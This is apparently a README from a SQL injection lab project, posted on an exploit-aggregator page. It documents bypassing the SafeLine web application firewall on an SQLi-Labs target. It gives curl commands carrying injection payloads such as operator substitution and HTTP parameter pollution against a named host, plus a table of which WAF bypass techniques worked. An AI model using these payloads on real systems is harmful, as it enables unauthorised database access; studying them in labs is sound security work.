Share
## https://sploitus.com/exploit?id=A0E3A5B2-E671-5511-B904-DEF30D3384C4
# SQLi-Labs WAF Bypass Project

> **Target**: `http://home.ctfstu.cn:6868/sql/Less-1/`  
> **WAF Type**: Changting Leichei SafeLine (Community Edition)  
> **Vulnerability Type**: SQL Injection (Error-Based โ€“ String)  
> **Testing Date**: 2026-07-08  
> **Testing Tools**: Burp Suite / cURL

---

## Project Structure

```
sqlilabs-waf-bypass/
โ”œโ”€โ”€ README.md                      # Project Description
โ”œโ”€โ”€ REPORT.md                      # Complete Test Report
โ”œโ”€โ”€ payloads/
โ”‚   โ”œโ”€โ”€ successful.txt             # Successful bypass payloads
โ”‚   โ”œโ”€โ”€ blocked.txt                # Payloads intercepted by WAF
โ”‚   โ””โ”€โ”€ all_payloads.txt           # Summary of all tested payloads
โ””โ”€โ”€ screenshots/
    โ””โ”€โ”€ (Screenshot Directory for Test Results)
```

## Environment Details

- ** Injection Point**: `GET /sql/Less-1/?id=1`
- ** Database**: MySQL
- ** WAF Version**: Changting Leichei SafeLine Community Edition
- ** Original SQL**: `SELECT * FROM users WHERE id='$id' LIMIT 0,1`
- ** Display Message**: `Your Login name:xxxYour Password:xxx`

---

## Quick Start

```bash
# 1. Normal Access
curl "http://home.ctfstu.cn:6868/sql/Less-1/?id=1"

# 2. Test WAF Interception (403 Error Returned When Interrupted)
curl "http://home.ctfstu.cn:6868/sql/Less-1/?id=1' OR '1'='1"

# 3. Operator Substitution to Bypass WAF
curl "http://home.ctfstu.cn:6868/sql/Less-1/?id=1' || 1=1 #"

# 4. HPP Parameter Pollution Bypass
curl "http://home.ctfstu.cn:6868/sql/Less-1/?id=1&id=2"
```

---

## Test Result Overview

| Bypass Technique | Status | Description |
|-----------------|-------|-------------|
| Operator substitution: `\|\|` instead of `OR` | โœ… Successful | WAF does not intercept logical operators |
| Operator substitution: `&&` instead of `AND` | โœ… Successful | WAF does not intercept logical operators |
| HPP parameter pollution | โœ… Successful | WAF only checks the first parameter |
| Newline character `%0a` instead of space | โœ… Successful | Can be used in `\|\|` injections |
| Split keywords from inline comments | โš ๏ธ Semi-Successful | Passed WAF but MySQL syntax error |
| Newline character `%0a` splits keywords | โš ๏ธ Semi-Successful | Passed WAF but MySQL syntax error |
| Mixed case | โŒ Failed | WAF does not distinguish between uppercase and lowercase |
| Double URL encoding | โŒ Failed | WAF performs deep decoding |
| Extremely long payloads | โŒ Failed | WAF checks all lengths |
| MySQL conditional comments | โŒ Failed | WAF does not parse `/*!...*/` |

See the complete analysis in [REPORT.md](./REPORT.md).